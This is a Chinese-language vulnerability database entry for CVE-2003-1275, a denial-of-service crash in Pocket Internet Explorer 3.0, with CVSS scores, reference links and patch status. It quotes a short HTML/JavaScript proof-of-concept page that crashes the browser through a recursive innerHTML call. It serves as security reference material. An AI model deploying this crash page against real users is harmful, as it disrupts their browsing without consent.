CVE-2003-1275
CVSS5.0
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:30
NMCOE    

[原文]Pocket Internet Explorer (PIE) 3.0 allows remote attackers to cause a denial of service (crash) via a Javascript function that uses the object.innerHTML function to recursively call that function.


[CNNVD]Microsoft Pocket Internet Explorer远程拒绝服务攻击漏洞(CNNVD-200312-216)

        
        Pocket Internet Explorer是一款用于Pocket PC上的WEB浏览器。
        Pocket IE不正确处理部分Javascript代码,远程攻击者可以利用这个漏洞构建恶意WEB页,诱使用户访问,导致Pocket IE崩溃。
        攻击者建立一个调用某一页面中JavaScript的object.innerHTML函数写入到页面本身的WEB页,可导致Pocket Internet Explorer浏览器访问此页面时崩溃。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1275
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1275
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-216
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/6507
(UNKNOWN)  BID  6507
http://www.iss.net/security_center/static/11004.php
(UNKNOWN)  XF  pie-javascript-objectinnerhtml-dos(11004)
http://archives.neohapsis.com/archives/bugtraq/2003-01/0013.html
(VENDOR_ADVISORY)  BUGTRAQ  20030103 JS Bug makes it possible to deliberately crash Pocket PC IE

- 漏洞信息

Microsoft Pocket Internet Explorer远程拒绝服务攻击漏洞
中危 其他
2003-12-31 00:00:00 2006-01-20 00:00:00
远程  
        
        Pocket Internet Explorer是一款用于Pocket PC上的WEB浏览器。
        Pocket IE不正确处理部分Javascript代码,远程攻击者可以利用这个漏洞构建恶意WEB页,诱使用户访问,导致Pocket IE崩溃。
        攻击者建立一个调用某一页面中JavaScript的object.innerHTML函数写入到页面本身的WEB页,可导致Pocket Internet Explorer浏览器访问此页面时崩溃。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.microsoft.com/technet/security/

- 漏洞信息 (22119)

Microsoft Pocket Internet Explorer 3.0 Denial Of Service Vulnerability (EDBID:22119)
windows dos
2003-01-03 Verified
0 Christopher Sogge Røtnes
N/A [点击下载]
source: http://www.securityfocus.com/bid/6507/info

A denial of service vulnerability has been reported for Pocket Internet Explorer (PIE). The vulnerability is due to the way some JavaScript code is interpreted by PIE.

By enticing a victim user to browse a maliciously crafted web page an attacker can cause PIE to crash. 

<html> <head>
<script language="Javascript">
function displayPage(page){
if(page=="onload"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash
me</a>";}
if(page=="crash"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">crash!</a>";}
}
</script> </head>
<body onLoad="displayPage('onload');"> <hr> <span id="main"></span> </body> </html> 		

- 漏洞信息

60282
Microsoft Pocket IE (PIE) object.innerHTML Function Remote DoS
Remote / Network Access, Local / Remote, Context Dependent Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2003-01-03 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站